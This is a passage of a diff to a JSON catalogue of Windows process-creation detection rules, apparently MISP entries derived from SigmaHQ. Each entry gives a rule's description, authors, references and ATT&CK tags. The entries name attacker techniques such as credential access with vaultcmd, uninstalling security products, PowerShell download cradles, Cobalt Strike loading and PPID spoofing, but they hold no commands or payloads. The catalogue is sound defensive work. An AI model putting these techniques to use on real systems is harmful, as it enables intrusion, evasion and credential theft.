], "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1562.004" ] }, - "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "value": "Detection of PowerShell Execution via Sqlps.exe" + "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "value": "Netsh Port or Application Allowed" }, { - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "meta": { - "author": "Agro (@agro_sev) oscd.communitly", - "creation_date": "2020/10/13", - "falsepositive": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." - ], - "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", - "value": "SQL Client Tools PowerShell Session Detection" - }, - { - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", - "meta": { - "author": "Agro (@agro_sev) oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" - ], - "filename": "proc_creation_win_susp_use_of_te_bin.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" - ], - "tags": [ - "attack.t1218" - ] - }, - "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", - "value": "Malicious Windows Script Components File Execution by TAEF Detection" - }, - { - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "meta": { - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "The process spawned by vsjitdebugger.exe is uncommon." - ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/pabraeken/status/990758590020452353", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", - "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion" - ] - }, - "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", - "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" - }, - { - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "description": "Detects suspicious process related to rundll32 based on arguments", "meta": { "author": "frack113", - "creation_date": "2022/04/08", + "creation_date": "2021/12/04", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rundll32_script_run.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "value": "Suspicious Rundll32 Script in CommandLine" + }, + { + "description": "Detects a Windows program executable started from a suspicious folder", + "meta": { + "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "creation_date": "2017/11/27", + "falsepositive": [ + "Exotic software" + ], + "filename": "proc_creation_win_system_exe_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "value": "System File Execution Location Anomaly" + }, + { + "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_vaultcmd.yml", + "filename": "proc_creation_win_findstr_recon_everyone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" ], "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1552.006" ] }, - "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", - "value": "Windows Credential Manager Access via VaultCmd" + "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", + "value": "Suspicious Recon Activity Using Findstr Keywords" }, { - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", "meta": { - "author": "Konstantin Grishchenko, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" - ], - "filename": "proc_creation_win_susp_vboxdrvinst.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", - "https://twitter.com/pabraeken/status/993497996179492864", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "value": "Suspicious VBoxDrvInst.exe Parameters" - }, - { - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/05", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "creation_date": "2019/10/26", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "filename": "proc_creation_win_susp_child_process_as_system_.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/antonioCoco/RogueWinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.t1134.002" ] }, - "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "value": "Suspicious VBScript UN2452 Pattern" + "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "value": "Suspicious Child Process Created as System" }, { - "description": "Detects commands that temporarily turn off Volume Snapshots", + "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", "meta": { "author": "Florian Roth", - "creation_date": "2021/01/28", + "creation_date": "2021/07/03", "falsepositive": [ - "Legitimate administration" + "Unknown" ], - "filename": "proc_creation_win_susp_volsnap_disable.yml", + "filename": "proc_creation_win_apt_revil_kaseya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://www.joesandbox.com/analysis/443736/0/html", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.g0115" + ] + }, + "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "value": "REvil Kaseya Incident Malware Patterns" + }, + { + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "value": "Obfuscated IP Download" + }, + { + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1354766164166115331", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/threat-detection-report/", + "https://www.cobaltstrike.com/help-windows-executable", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.011" ] }, - "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", - "value": "Disabled Volume Snapshots" + "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "value": "CobaltStrike Load by Rundll32" }, { - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "meta": { - "author": "bohops", - "creation_date": "2022/10/30", - "falsepositive": [ - "False positives depend on custom use of vsls-agent.exe" - ], - "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bohops/status/1583916360404729857", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "43103702-5886-11ed-9b6a-0242ac120002", - "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" - }, - { - "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_webdav_client_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", - "value": "Suspicious WebDav Client Execution" - }, - { - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "description": "Detects suspicious ways to download files or content using PowerShell", "meta": { "author": "Florian Roth", - "creation_date": "2022/08/26", + "creation_date": "2022/03/24", "falsepositive": [ - "Unknown" + "Scripts or tools that download files" ], - "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "filename": "proc_creation_win_susp_powershell_download_cradles.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" ], "tags": "No established tags" }, - "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "value": "Suspicious SysAidServer Child" + "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", + "value": "PowerShell Web Download" }, { - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/14", + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", "falsepositive": [ - "Unknown" + "Admin activity" ], - "filename": "proc_creation_win_susp_wermgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://www.echotrail.io/insights/search/wermgr.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" - ], - "tags": "No established tags" - }, - "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "value": "Suspicious WERMGR Process Patterns" - }, - { - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_where_execution.yml", + "filename": "proc_creation_win_network_sniffing.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" ], "tags": [ + "attack.credential_access", "attack.discovery", - "attack.t1217" + "attack.t1040" ] }, - "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "value": "Suspicious Where Execution" + "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "value": "Network Sniffing" }, { - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "description": "Detects a suspicious parents of powershell.exe", "meta": { - "author": "Florian Roth", - "creation_date": "2018/08/13", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/03/20", "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Other scripts" ], - "filename": "proc_creation_win_susp_whoami.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "value": "Whoami Execution" - }, - { - "description": "Detects the execution of whoami with suspicious parents or parameters", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/12", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "filename": "proc_creation_win_susp_powershell_parent_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" ], "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1059.001" ] }, - "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "value": "Whoami Execution Anomaly" + "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", + "value": "Suspicious PowerShell Parent Process" }, { - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "meta": { "author": "Florian Roth", - "creation_date": "2021/11/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_whoami_as_param.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "value": "WhoAmI as Parameter" - }, - { - "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" - ], - "filename": "proc_creation_win_susp_winrar_dmp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", - "value": "Winrar Compressing Dump Files" - }, - { - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "meta": { - "author": "Florian Roth, Tigzy", - "creation_date": "2021/11/17", - "falsepositive": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" - ], - "filename": "proc_creation_win_susp_winrar_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1460978167628406785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", - "value": "Winrar Execution in Non-Standard Folder" - }, - { - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/06", + "creation_date": "2022/07/23", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", - "level": "medium", + "filename": "proc_creation_win_selectmyparent.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", + "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1134.004" ] }, - "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", - "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" + "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", + "value": "PPID Spoofing Tool Usage" }, { - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Legitimate use for administartive purposes. Unlikely" - ], - "filename": "proc_creation_win_susp_winrm_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bohops/status/994405551751815170", - "https://redcanary.com/blog/lateral-movement-winrm-wmi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "value": "Remote Code Execute via Winrm.vbs" - }, - { - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "meta": { - "author": "frack113", - "creation_date": "2021/07/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_winzip.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" - }, - { - "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "meta": { "author": "Florian Roth", - "creation_date": "2021/06/25", - "falsepositive": [ - "Legitimate software creating script event consumers" - ], - "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.003" - ] - }, - "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", - "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" - }, - { - "description": "Detects WMIC executing suspicious or recon commands", - "meta": { - "author": "Michael Haag, Florian Roth, juju4, oscd.community", - "creation_date": "2019/01/16", - "falsepositive": [ - "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" - ], - "filename": "proc_creation_win_susp_wmic_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", - "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", - "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ] - }, - "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", - "value": "Suspicious WMIC Execution" - }, - { - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2020/10/12", + "creation_date": "2022/01/20", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_wmic_proc_create.yml", + "filename": "proc_creation_win_susp_advancedrun_priv_user.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "value": "Suspicious WMIC Execution - ProcessCallCreate" - }, - { - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/01/30", - "falsepositive": [ - "Legitimate administration" - ], - "filename": "proc_creation_win_susp_wmic_security_product_uninstall.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cglyer/status/1355171195654709249", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "847d5ff3-8a31-4737-a970-aeae8fe21765", - "value": "Wmic Uninstall Security Product" - }, - { - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "meta": { - "author": "Maxime Thiebaut (@0xThiebaut)", - "creation_date": "2021/10/21", - "falsepositive": [ - "Legitimate usage of the uncommon Windows Work Folders feature." - ], - "filename": "proc_creation_win_susp_workfolders.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/elliotkillick/status/1449812843772227588", - 